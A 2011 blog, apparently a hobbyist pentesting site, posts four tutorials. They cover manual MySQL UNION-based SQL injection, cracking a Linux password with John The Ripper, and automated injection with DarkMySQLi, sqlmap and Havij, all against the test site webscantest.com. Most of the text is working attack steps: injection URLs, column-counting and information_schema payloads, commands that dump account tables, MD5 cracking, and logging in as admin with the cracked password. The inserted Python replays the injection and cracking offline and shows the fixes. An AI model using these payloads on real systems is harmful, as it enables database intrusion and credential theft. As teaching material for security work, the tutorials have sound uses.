Saturday, June 25, 2011

MySQL 5.0 --> Should've Used Is_Numeric()

Hello, and welcome to my guide on manual SQL injection against MySQL 5.0 servers. This will cover basic injection, all the way from finding a vulnerable target to dumping rows of data from a database. You will also use a couple of SQL statements and functions, and actually get a grasp of what a table looks like. Furthermore, every hacker should be able to exploit these vulnerabilities manually, whether the root cause is incorrect type handling (a number that is never checked to be a number) or incorrectly filtered escape characters (a quote that is never escaped); these two mistakes are what open the door for injection in the first place.


When injection occurs, rows of data are dumped from a column, which is grouped with a bunch of other columns inside a table, which is grouped with a bunch of other tables inside a database, which is grouped with a bunch of other databases inside a server. Whoa! That probably sounded like a bunch of bullshit, huh? Well, you should have a basic understanding by the end of the tutorial. Have you ever seen a spreadsheet? Think of that as a table. Think of a bunch of those as a database.

Firstly, you should make sure you have the prerequisites, just like any other guide I have written. Fortunately for you, all you need is an Internet connection and a web browser. I don't care if you run Linux, Windows, or Mac (eeeewwwww).

Like most of the guides about web application penetration testing, we are going to use the following target-

http://www.webscantest.com/

Just for the hell of it, I'm going to use Linux for this tutorial, just because I feel like it. :D

Now then, the vulnerable page is here-

http://webscantest.com/datastore/search_get_by_id.php?id=4

When you navigate to it, you should see this-

Looks like a normal page, right? Let's test for vulnerability by adding a ' (apostrophe) to the end of the url-

http://webscantest.com/datastore/search_get_by_id.php?id=4'

Here is the output-

Hmm. Looks like we have an SQL error. Now let's think about that for a minute. The error clearly states we have an error in our SQL syntax, which tells us two things: the application is passing our input straight into a query, and it is echoing the database's error messages back to us. That is how we confirm the vulnerability, at least to some extent. But what is happening when we add the apostrophe? In the first screenshot, the id parameter carried the value 4. When we added an apostrophe, we sent a non-numeric value, and the application neither rejected it nor escaped it: it was concatenated into the SQL string as-is, so the quote became part of the query and broke its syntax. Because the value is used unquoted (it is supposed to be a number), we don't even need a quote to break out; whatever we put after the 4 is interpreted as SQL. If we can return more than just a number, why not return tables and columns?

Well, let's find our column count, meaning the number of columns the page's own SELECT returns; we need it because the UNION SELECT we are building up to has to return exactly the same number. To do this, we will use ORDER BY with a column position, incrementing by 1 until we get an error: ordering by a position that doesn't exist is a syntax error.

First type-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 1--


No error, right? Let's speed it up now. Instead of incrementing by 1, let's jump to 5-


http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 5--

Whoops. We got another SQL error. Since we know the column count is at least 1 (no error on 1) but less than 5, let's count back down by 1-

http://webscantest.com/datastore/search_get_by_id.php?id=4 order by 4--

Alright, no error. Since we got an error on 5 but not on 4, the query returns 4 columns.

Now we're going to use the UNION method. UNION ALL appends the rows of a SELECT of our own to the page's query, as long as ours returns the same number of columns, which is why we needed the count. Selecting plain numbers first shows us which of the four columns are actually rendered on the page, and therefore which ones we can use to read data out-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,2,3,4--

Here is the output-

All of a sudden we see another little addition to the web page: a 1, 2 and 3 that weren't there before. Those numbers are our row, so columns 1, 2 and 3 are displayed (column 4 is not rendered, so it is no use to us). Now we have columns to inject into. Let's enumerate!

Let's find the version of the database. The column I'm going to inject inside of is 2-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,version(),3,4--

Here is my output-

Now, instead of a 2, we see the version of the database. Let's find the name of the database-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,database(),3,4--

Instead of the version, we now see the name of the current database, which is scanme. What about the database user?

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,user(),3,4--

The second column now shows scanme@localhost. That is the MySQL account the web application uses to connect, not an account on the scanme database, and everything we do from here runs with whatever privileges that account has. This kind of information is useful for further testing (localhost also tells us the database sits on the web server itself). But now we want all of the tables in the database. Since the version is 5.0 or later (information_schema was introduced in MySQL 5.0, which is why this guide is about 5.0), we can read information_schema. It is a virtual database that describes every other database on the server, as far as our account is allowed to see. Let's try it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,table_name,3,4 from information_schema.tables--

Here is the output-

Most of the tables we see belong to information_schema itself (restricting the query on its table_schema column to the current database would skip them). But two near the bottom of the page look out of the ordinary in comparison to the others- accounts and inventory. We are going to dump the columns of the accounts table, because why do we care what they have in stock?

To do this we filter information_schema.columns on table_name. That means passing a string, and we want to avoid putting quote characters in the URL: the application may escape them, and we have already seen that a stray quote breaks the query. The trick is MySQL's char() function, which builds the string from the decimal ASCII code of each character of accounts (97 is a, 99 is c, and so on; any ASCII table, an online converter or the encoder built into a tool like WebSlayer gives you the values). A hexadecimal string literal works the same way. This is how we do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,column_name,3,4 from information_schema.columns where table_name= char(97,99,99,111,117,110,116,115)


Here is the output-

From these columns we are going to dump the data from the uname and passwd columns. Let's do it-

http://webscantest.com/datastore/search_get_by_id.php?id=4 union all select 1,concat(uname,0x3a,passwd),3,4 from accounts--

This MySQL query will give us output like so-

We now have the usernames and passwords stored in the database, displayed in the order we concatenated them, uname:passwd. We have the passwords, true, but they are hashed: 32 hex characters with no salt in sight, which is what plain MD5 looks like. Let's crack them!
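To make the mechanics concrete, here is an added example (my code, not the page's or webscantest's) that replays the whole procedure above, the apostrophe test, the ORDER BY column count and the UNION ALL dump, against an in-memory SQLite copy of a made-up accounts table with the five columns the tutorials find (id, uname, passwd, fname, lname). Every value in it is constructed apart from admin's hash, which is the MD5 of "admin" that the dumps show. SQLite stands in for MySQL because it runs anywhere with no server: it spells concat(uname,0x3a,passwd) as uname || ':' || passwd, has no information_schema, and its error text differs, but the injection logic is identical. The vulnerable function sits next to the hardened one so you can see exactly what the title's is_numeric() check, plus a bound parameter, changes.

```python
import sqlite3

# Constructed stand-in for the target's scanme.accounts table. Values are made
# up except admin's hash, the MD5 of "admin" that the tutorials dump.
SCHEMA = """
CREATE TABLE accounts (id INTEGER, uname TEXT, passwd TEXT, fname TEXT, lname TEXT);
INSERT INTO accounts VALUES (1, 'admin', '21232f297a57a5a743894a0e4a801fc3', 'Site', 'Admin');
INSERT INTO accounts VALUES (4, 'bob', '0000000000000000000000000000dead', 'Bob', 'Jones');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_search(db, id_param):
    """What search_get_by_id.php is doing: the raw parameter is pasted into the
    SQL text, so everything after the digits is parsed as SQL. The SELECT
    returns four columns, which is why ORDER BY 5 fails in the walkthrough."""
    sql = "SELECT id, uname, fname, lname FROM accounts WHERE id=" + id_param
    return db.execute(sql).fetchall()


def hardened_search(db, id_param):
    """The fix: reject anything that is not an integer, then bind the value as
    a query parameter so the database never sees it as SQL. The digit check is
    the is_numeric()/intval() idea from the title; binding is the part that also
    protects string parameters such as name=Rake, where a numeric check is useless."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, uname, fname, lname FROM accounts WHERE id=?"
    return db.execute(sql, (int(id_param),)).fetchall()


def hardened_rejects(db, id_param):
    """True when the hardened version refuses the parameter before any query runs."""
    try:
        hardened_search(db, id_param)
    except ValueError:
        return True
    return False


def is_injectable(db, id_value):
    """The apostrophe test: a syntax error proves the quote reached the SQL parser."""
    try:
        vulnerable_search(db, id_value + "'")
    except sqlite3.OperationalError:
        return True
    return False


def find_column_count(db, id_value, limit=20):
    """ORDER BY n succeeds while n <= number of selected columns; the first n
    that errors is one past the count."""
    for n in range(1, limit + 1):
        try:
            vulnerable_search(db, f"{id_value} order by {n}--")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump(db, id_value, ncols, expression, table, show_col=2):
    """UNION ALL our own SELECT onto the page's query, putting `expression` in
    the column the page renders (column 2 in the walkthrough) and numeric
    fillers elsewhere. 'and 1=2' drops the page's own row so only ours remain."""
    cols = [expression if i == show_col else str(i) for i in range(1, ncols + 1)]
    payload = f"{id_value} and 1=2 union all select {','.join(cols)} from {table}--"
    return [row[show_col - 1] for row in vulnerable_search(db, payload)]


if __name__ == "__main__":
    db = connect()
    print("injectable:", is_injectable(db, "4"))
    n = find_column_count(db, "4")
    print("columns:", n)
    print(union_dump(db, "4", n, "uname || ':' || passwd", "accounts"))
    print("hardened rejects payload:", hardened_rejects(db, "4 order by 5--"))
```

Run it and it reports the target as injectable, finds 4 columns and prints the uname:passwd rows; every one of the same payloads is refused by hardened_search before a query is even built, which is the behaviour the title is asking for.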

As we can see from our lcrack output, the username is admin and the password is admin.

Thus we have successfully exploited the injection and walked from a single stray quote to the admin credentials. On the application side the fix is twofold: check that id really is an integer before using it, and, more importantly, pass it to MySQL as a bound parameter of a prepared statement (or at the very least cast it to an integer) so that user input is never parsed as SQL. Not echoing the database's error messages to the browser would also have made the enumeration a great deal slower.

Happy Hacking!

Sunday, June 19, 2011

John The Ripper- Destroying Passwords The Penguin Way

Hello, and welcome to my guide on using John The Ripper. Today we will be cracking our own Linux password. Now before you get all jumpy and excited about what you are going to learn, let me just say this- THE CAPABILITIES OF ANY PASSWORD CRACKING TOOL ARE ONLY AS GOOD AS YOUR WORDLIST. In other words, if you have a wordlist with 5 words in it, don't expect to crack anything. It would be like trying to drive a car without a motor. If you have no idea what a wordlist is, then I'll tell you- a wordlist, or dictionary file, is merely a .txt or .lst file (these are the usual extensions) with a bunch of words in it, one word per line. Parsing these files is easy: any high-level language can read them line by line (readline() or similar) and strip the trailing newline from each line before hashing it.

Here are some things you will probably need or want to have for this guide-

--> BackTrack 5 (or another Linux distro, preferably Ubuntu/Xubuntu/Kubuntu)
--> John The Ripper
--> Some way to generate a hash (online hash generator, WebSlayer, or something of the sort.)

I highly recommend using BackTrack 5. If for some reason you can't use it or just don't like it, take a look at Blackbuntu.

The first thing we're going to do is crack our own Linux password. If you are using BackTrack 5, and you haven't changed your password, the password is toor (we are using the root account). Let's get started!


To see all the available options for John The Ripper, simply type john in your Terminal with no arguments. Read through all the options; this is the best way to learn how penetration testing tools work, and you will usually learn something important from understanding even a single switch. We will be doing a couple of things with this tool, including cracking Linux passwords and a couple of other hash types.

Since we're cracking our own Linux password, we start with the /etc/passwd file. You can view it with any text editor or pager; I'm just going to use cat /etc/passwd. Here's what you should see-

If you have no idea how to read through this format, let me teach you. Let's just take the line from the root account and look at it-

root:x:0:0:root:/root:/bin/bash

If it looks a little confusing, don't worry, because once you understand it you can breeze right through through the whole passwd file. So lets break it down-

root --> This is the username field.

x --> This is the password field.

0 --> The User ID (UID) field.

0 --> The Group ID field.

root --> The User ID Information field. This field is used for comments and whatnot.

/root --> The Home Directory for the user.

/bin/bash --> The absolute path of the user's login shell. It doesn't have to be a shell (service accounts often get /bin/false or /usr/sbin/nologin so nobody can log in as them), but for real users it usually is.


So now, after looking at the above explanation, you're wondering why the password field holds an x. This is because the password is shadowed: the x is a placeholder, and the actual password hash is kept in /etc/shadow, which only root can read (every program needs to read /etc/passwd to look up user names, so the hashes were moved out of it). Note that the hash is not an encrypted password that can be decrypted; it is a one-way crypt(3) hash, and cracking it means guessing candidates and hashing each one until a guess produces the same hash. Because we are root on our own machine, we can read /etc/shadow directly. In a real engagement you would have obtained it through some other weakness (a readable backup, a file-read bug, or a root shell gained another way), and cracking the hashes in it is a step towards reusing those passwords elsewhere. Either way, john wants the passwd and shadow information combined into one record per user. That is what the unshadow utility shipped with John The Ripper does: it replaces the x in each /etc/passwd line with the matching hash from /etc/shadow. Navigate to the directory where John The Ripper is installed and type-

./unshadow /etc/passwd /etc/shadow


Here is the output-

As you can see, the password field now holds the real hash in place of the x. The string between the first two $ signs ($6$ for sha512crypt, the default on Ubuntu-based systems such as BackTrack 5, $1$ for the older md5crypt) tells john which crypt(3) scheme is in use, and the characters up to the next $ are the salt. The only thing left to do is crack this password with John The Ripper.
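As an added example (not part of the original post, and not john's own source), the following script parses /etc/passwd and /etc/shadow records and merges them the way unshadow does, replacing the x with the hash from the matching shadow entry; it then picks out the accounts that actually have a crackable hash and reads the $id$ prefix john uses to choose the format. The two sample files are constructed inline: the root hash is a placeholder string in sha512crypt's layout, not a real hash, alice's ! and daemon's * are the locked-account markers you will see on a real system, and guest has no shadow entry at all.

```python
PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "hash", "lastchg", "min", "max", "warn",
                 "inactive", "expire", "reserved")

# Constructed sample files. The root "hash" is a placeholder laid out like
# sha512crypt ($6$salt$hash); it is not a real hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:Alice Example,,,:/home/alice:/bin/bash
guest:x:1001:1001:Guest:/home/guest:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$c0nstructed$NotARealHashJustAPlaceholderForTheExample0123456789abcdef:15000:0:99999:7:::
daemon:*:15000:0:99999:7:::
alice:!:15000:0:99999:7:::
"""


def parse_records(text, fields):
    """Split colon-separated records into dicts keyed by user name.
    Neither file allows ':' inside a field, so a plain split is correct."""
    records = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(parts)}: {line!r}")
        rec = dict(zip(fields, parts))
        records[rec["name"]] = rec
    return records


def unshadow(passwd_text, shadow_text):
    """Return passwd-format lines with the 'x' replaced by the shadow hash.
    Users without a shadow entry keep whatever passwd had (normally 'x')."""
    pw = parse_records(passwd_text, PASSWD_FIELDS)
    sh = parse_records(shadow_text, SHADOW_FIELDS)
    merged = []
    for name, rec in pw.items():
        hash_ = sh[name]["hash"] if name in sh else rec["passwd"]
        merged.append(":".join([name, hash_, rec["uid"], rec["gid"],
                                rec["gecos"], rec["home"], rec["shell"]]))
    return merged


def crackable(merged_lines):
    """(name, hash) pairs worth feeding to john: skip locked ('!', '!!'),
    disabled ('*') and still-shadowed ('x') entries."""
    out = []
    for line in merged_lines:
        name, hash_ = line.split(":")[:2]
        if hash_ and hash_ != "x" and not hash_.startswith(("*", "!")):
            out.append((name, hash_))
    return out


def hash_scheme(hash_):
    """Name the crypt(3) scheme from the $id$ prefix, as john's autodetection does."""
    ids = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
    if hash_.startswith("$"):
        return ids.get(hash_.split("$")[1], "unknown")
    # Traditional DES crypt has no prefix and is always 13 characters.
    return "descrypt" if len(hash_) == 13 else "unknown"


if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    for line in merged:
        print(line)
    for name, h in crackable(merged):
        print(f"{name}: {hash_scheme(h)}")
```

Only the root line survives the crackable() filter, which is exactly the line the post tells you to copy into crackme.txt; keeping the whole merged line rather than just user:hash is what gives john's single mode the GECOS and home-directory words to build guesses from.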

What we're going to do is save the unshadowed root line into a text file (it can live anywhere, as long as you pass its path to john; putting it next to john just keeps the commands short). Copy the whole root line from the unshadow output, or at least its first two fields, the username and the hash, and put them in a text file. This is what it should look like-

I will save the file as crackme.txt

Now that we have our file ready, let's crack the hash!

There are two methods we will use on this hash. Firstly, a wordlist (dictionary) attack; we talked about wordlists, remember? John The Ripper ships with its own wordlist, password.lst, so don't worry if you think you don't have one. The other method is single crack mode (--single), and I'll mention the real brute force (--incremental) after that. First, the dictionary attack-

./john --wordlist=password.lst crackme.txt

Here's the output-

As you can see, John The Ripper detected what type of hash we were cracking and returned the plaintext password next to the username. Cool! Next is single crack mode, --single. Despite what the name suggests, this is not a brute force: it builds guesses from the account's own login name and GECOS fields, runs them through a set of mangling rules (capitalisation, appended digits and so on), and tries those first, which is why it is fast and why it is worth running before anything else-

./john --single crackme.txt

Here's the output-

The real brute force is the --incremental option: it tries every combination of characters from a chosen character set, in roughly the order a real password is likely to use them, and you choose the set with a mode name (for example --incremental=Digits or --incremental=Alpha; the default covers all printable ASCII). Unlike the wordlist and single modes, it does not finish on its own for anything but short passwords, so stop it with Ctrl-C when you have had enough; john saves its progress and will resume.

TROUBLESHOOTING-

Q- I get the following error- "No password hashes loaded".

A- The most likely reason is that John The Ripper has already cracked every hash in the file; the results are in john.pot, and you can display them with john --show crackme.txt. The other common cause is that the file is not in a format john recognizes (check that each line is user:hash with the full hash string intact). Deleting john.pot does let you crack the same hash again, but it also throws away every password john has ever cracked for you, so prefer --show.

Q- John The Ripper didn't crack my password. What the hell?

A- WHY DID YOU PICK SUCH A STRONG PASSWORD?! Just kidding, good job on taking your security seriously. There are two solutions to this problem- either put your password in the wordlist (password.lst), or change your password to something stupid (just for this guide). If you choose the latter, make sure you change your password back to what it was.

HAPPY HACKING!

Saturday, June 11, 2011

DarkMySQLi - A MySQL Injection Script For Penetration Testers

Hello, and welcome to my guide on basic usage of DarkMySQLi, a great tool for injecting MySQL databases. This guide will go from detecting a vulnerable MySQL database server to successful exploitation of the actual database with this tool. As always, we will be using the ever-so-vulnerable test website-

http://www.webscantest.com/

Requirements for this guide are-

-->BackTrack 5
-->DarkMySQLi
-->An Internet connection

The actual URL we will be navigating to is-

http://www.webscantest.com/datastore/search_get_by_id.php?id=4

From this URL we can see that the id parameter carries the integer value 4.

Here's what the web page looks like-

If you want to check for vulnerability, then just add an apostrophe to the end of the URL, like so-


http://www.webscantest.com/datastore/search_get_by_id.php?id=4'


This is what the page will look like once you execute this request-

From this error, we can see that our quote broke the syntax of the query the page sends to the database, so our input reaches the SQL parser unfiltered. The wording of the error also tells us that the remote database server is MySQL. Now we can fire up DarkMySQLi and attack the database.


First we need to find the number of columns returned by the page's query (the same ORDER BY and UNION probing as in the manual guide, automated). To do this, we will use this command-

python DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4 --findcol


Here is the output for the above command-

From the output we can see that the column length is 4. But we also see two URL's- the actual URL used to enumerate the column length, and a URL generated by DarkMySQLi. The DarkMySQLi URL is the URL we will use for this tool. If you want to browse to the real URL, hold down Ctrl and click the real URL inside your Terminal window (not the DarkMySQLi URL).

Now we want to find all the tables of the database. We can do this easily with the --full option, which will help us enumerate everything we can. To do this, type-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- --full


This command will enumerate everything possible. This switch (--full) only works for MySQL v5.0 and above. :)

Here is the output-

Now we have the name of the database, the names of all the tables in the database, and the names of all the columns for each table. I am going to gather all the data from the accounts table with the following command-

python ./DarkMySQLi.py -u http://www.webscantest.com/datastore/search_get_by_id.php?id=4+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,darkc0de-- -D scanme -T accounts -C id,uname,passwd,fname,lname --dump

It's a rather long command, but it will extract every column we listed from the accounts table. Here is the output-

From the output shown above, we have successfully extracted the contents of the accounts table. It takes a couple of seconds, but you should be able to read the output just fine.

Now think about the order of the command you used. If we listed id,uname,passwd,fname, and lname (in that order), then the output will be in the same order. This means that if the first row of data looks like this-

1:admin:21232f297a57a5a743894a0e4a801fc3


then the id is 1, the uname is admin, and the passwd is 21232f297a57a5a743894a0e4a801fc3. Looks like an MD5 hash. Let's save it to a text file and crack it with lcrack-

From the output of lcrack, the username is admin (duh) and the password is admin. Navigate to-

http://www.webscantest.com/login.php

and log in with the username admin and the password admin. Happy Hacking! :)


(To download lcrack, type in apt-get install lcrack)

Friday, June 10, 2011

Sqlmap- SQL Injection for Penguins

Hello, and welcome to my guide to basic usage of sqlmap. For this guide, I will be using BackTrack 5 as my Linux distribution, which ships with sqlmap, but sqlmap is a Python script, so it runs on any other Linux distribution or on Windows wherever a Python interpreter is installed. You can download it here-

http://sqlmap.sourceforge.net/


For this tutorial, our target will be-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Now then, let's fire up sqlmap and get started.


First of all, the web page you are viewing should look like this-

If you are not seeing the above web page, check the URL you entered and make sure you are connected to the Internet. At this point, we know that the GET parameter name carries the value Rake. We will use an apostrophe as a test for SQL injection, just as with the numeric id parameter in the other guides. Note that this parameter is a string, so in the query it sits between quotes; the apostrophe closes that string early, which is why a numeric check like is_numeric() would not help here, only proper escaping or, better, a prepared statement. Now our URL should look like this-

http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake'

Reload the web page, and view the output, which should look like this-

From the above output of the web page, we can assume poorly written SQL code was written for a MySQL database server, and that it is indeed vulnerable.

At this point we can attack the database server using sqlmap. So fire up sqlmap in your terminal and type-


./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake


Your output for this command will look like this-

From the output of sqlmap, we know that it is possible to inject SQL queries using sqlmap. Now we need to find all the databases. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake --dbs

This command will enumerate all databases in the MySQL server. This should be your output-

From this output, we can see two databases-

scanme
information_schema

 

Now we will enumerate all the tables within the scanme database. To do this, type-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme --tables

Here is the output-

Call it a hunch, but I am willing to bet that user credentials are going to be found in the accounts table. Let's find out-

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --columns

 

And here's the output-

From this output we can see that there are 5 columns-

fname
id
lname
passwd
uname

 

Now we can dump all the rows of data from whatever columns we want. Let's dump all of it, shall we?

./sqlmap.py -u http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake -D scanme -T accounts --dump


Here is the output-

Hmm. sqlmap recognized hash values in the dump, most likely from the passwd column. At least the passwords aren't stored in plaintext... although unsalted MD5 is not much better. sqlmap has a built-in dictionary attack for exactly this situation: it hashes every word in a wordlist and compares the result with the dumped hashes (a dictionary attack, not a collision; a match means we have found the real password, and it works because the hashes are unsalted and the passwords are weak). So as an answer to sqlmap's question type Y, hit Enter to accept the default wordlist, and answer N to the prompt about password suffixes (we don't need them yet)-

From the output, the hashes have been cracked, and we have the plaintext passwords for every user, including admin. Now browse to-

http://www.webscantest.com/login.php



From here you can login as admin. Happy hacking!

Monday, June 6, 2011

Havij- SQL Injection For Script Kiddies

Today I am going to be talking about a very awesome SQL injection tool, Havij. I will be honest, this tool is insanely script kiddie, as in the only thing I have to worry about is whether my index finger hurts from clicking a few times. But seriously, this tool is no joke. Besides being able to extract data from MySQL databases with ease, it will also find administrator login pages, look up MD5 hashes, and even give you a command shell on Microsoft SQL Server. It has error-based, time-based and blind injection modes, works with GET and POST requests, and handles both integer and string injection points. It's very useful for penetration testing, and even if it doesn't actually do the work for you, well, you can do it manually, right?

So, to follow this tutorial, you will need a Windows machine, Havij (duh), and access to the Internet. Do you have all of that? Good. Let the hacking begin!

So fire up Havij. You should see something like this (click on the image to enlarge)-

Looks pretty script kiddie, doesn't it? Now for our target URL. I am going to be using a great site for web app pentesting, which you can find here-


http://www.webscantest.com/

The vulnerable page we will be using is here-


http://webscantest.com/datastore/search_get_by_id.php?id=3

Copy the above URL and paste it into the Target field of Havij. Now click Analyze. You will see something like this-

In the bottom scroll box of Havij, you can see the Injection Type, the database server version, the current database, and whether the target is vulnerable or not (in this case, it is). =)

 
Now click on the Tables button. You will see this-

Now click on the Get DB's button. In the left list box, you should see another database appear, called information_schema. You do not need to check this database unless you want to, because more likely than not, all the important tables, columns, and rows of data are in the scanme database.

Now you will need to click the Get Tables button (make sure you have the scanme database checked off). You will then get some output like this-

Now, as you can see in the left list box, we have extracted two tables from the scanme database- inventory and accounts. I don't care what they're selling, I just want privileges! So check off the accounts table (you can also check off the inventory table if you want to).

Now we want to extract columns from our table. After you have checked off the accounts table, click Get Columns. You will then see this-

Cool! We can see 5 columns we extracted from the accounts table. The names of these are-

--> lname
--> fname
--> passwd
--> uname
--> id


From this point on, we can now extract the data from all of these columns. Check off the ones you want to extract data from (I will just check them all off), and now we can get some account credentials!

As you can see, we have administrator credentials. But wait! An MD5 hash! Well, there is an MD5 cracking utility built into Havij.....

Yeah, let's use it. The MD5 cracker in Havij is not really a cracker at all: Havij submits the hash to a number of online MD5 lookup services and reports whatever they return. That only works for unsalted hashes of common passwords those sites have already seen, and it means the hash (and so, probably, a real credential of the target) is handed to third parties, which you should think twice about on a real engagement. To use it, double-click the admin hash in the passwd column of the data dump to highlight it, copy it (Ctrl-C), click the MD5 button, paste the hash into the MD5 hash text box and click Start. When all is said and done, you will see this-
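The cracking step is the same in all four write-ups (lcrack in the first two, sqlmap's built-in wordlist attack, and Havij's online lookups here), so here is one added example that does it offline (my code, not lcrack, sqlmap or Havij). It reads a uname:hash dump, first tries guesses derived from the login name the way John's single mode does, then hashes a small wordlist through a few mangling rules and looks each result up against all remaining hashes at once, which is what makes unsalted MD5 so cheap to attack. The dump and wordlist are constructed inline: admin's hash is the real MD5 of "admin" from the tutorials, the other two users and the wordlist are made up, and one user is left uncracked on purpose.

```python
import hashlib


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


# Constructed dump in the uname:passwd layout the injection returns. admin's
# hash is the literal value seen in the tutorials (MD5 of "admin"); bob's and
# carol's are computed here from made-up passwords, not real credentials.
DUMP = "\n".join([
    "admin:21232f297a57a5a743894a0e4a801fc3",
    "bob:" + md5_hex("Password1"),
    "carol:" + md5_hex("correct horse battery staple"),
])

# Stand-in for john's password.lst / sqlmap's default wordlist.
WORDLIST = ["123456", "password", "admin", "letmein", "welcome"]

# A handful of the mangling rules a wordlist run applies to every word.
RULES = [
    lambda w: w,
    lambda w: w.capitalize(),
    lambda w: w.upper(),
    lambda w: w + "1",
    lambda w: w.capitalize() + "1",
    lambda w: w + "123",
]


def parse_dump(text):
    """'uname:hash' per line -> {uname: hash}, as the injection output is laid out."""
    targets = {}
    for line in text.splitlines():
        uname, hash_ = line.split(":", 1)
        targets[uname.strip()] = hash_.strip().lower()
    return targets


def single_mode_candidates(uname):
    """What john's --single mode does: guesses built from the login name itself."""
    return [uname, uname.capitalize(), uname + "1", uname + "123", uname[::-1]]


def wordlist_candidates(wordlist, rules=RULES):
    """Every word through every rule, de-duplicated, in wordlist order."""
    seen = set()
    for word in wordlist:
        for rule in rules:
            cand = rule(word)
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(targets, wordlist=WORDLIST):
    """Return {uname: plaintext} for every hash we can match.
    Single mode first (per user), then one pass over the wordlist in which each
    candidate is hashed once and checked against every remaining user: with no
    salt, identical passwords have identical hashes, so the cost does not grow
    with the number of users."""
    cracked = {}
    remaining = dict(targets)
    for uname in list(remaining):
        for cand in single_mode_candidates(uname):
            if md5_hex(cand) == remaining[uname]:
                cracked[uname] = cand
                del remaining[uname]
                break
    by_hash = {}
    for uname, h in remaining.items():
        by_hash.setdefault(h, []).append(uname)
    for cand in wordlist_candidates(wordlist):
        if not by_hash:
            break
        for uname in by_hash.pop(md5_hex(cand), []):
            cracked[uname] = cand
    return cracked


if __name__ == "__main__":
    targets = parse_dump(DUMP)
    found = crack(targets)
    for uname in targets:
        print(f"{uname}: {found.get(uname, '<not in wordlist>')}")
```

admin falls to single mode immediately, bob falls to the "password" entry plus a capitalise-and-append-1 rule, and carol survives because her passphrase is in no wordlist, which is the whole reason a good wordlist matters more than the tool. A per-user salt would force the wordlist pass to be repeated for every account and would defeat the online lookup services Havij relies on entirely.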

According to the output, the plain text of our MD5 hash is admin. Now navigate to the login page of our vulnerable site-


http://www.webscantest.com/login.php

In the Login: field, we will use our uname, which is admin. And for the Password: field, we will use our password, which is admin.

Happy Hacking!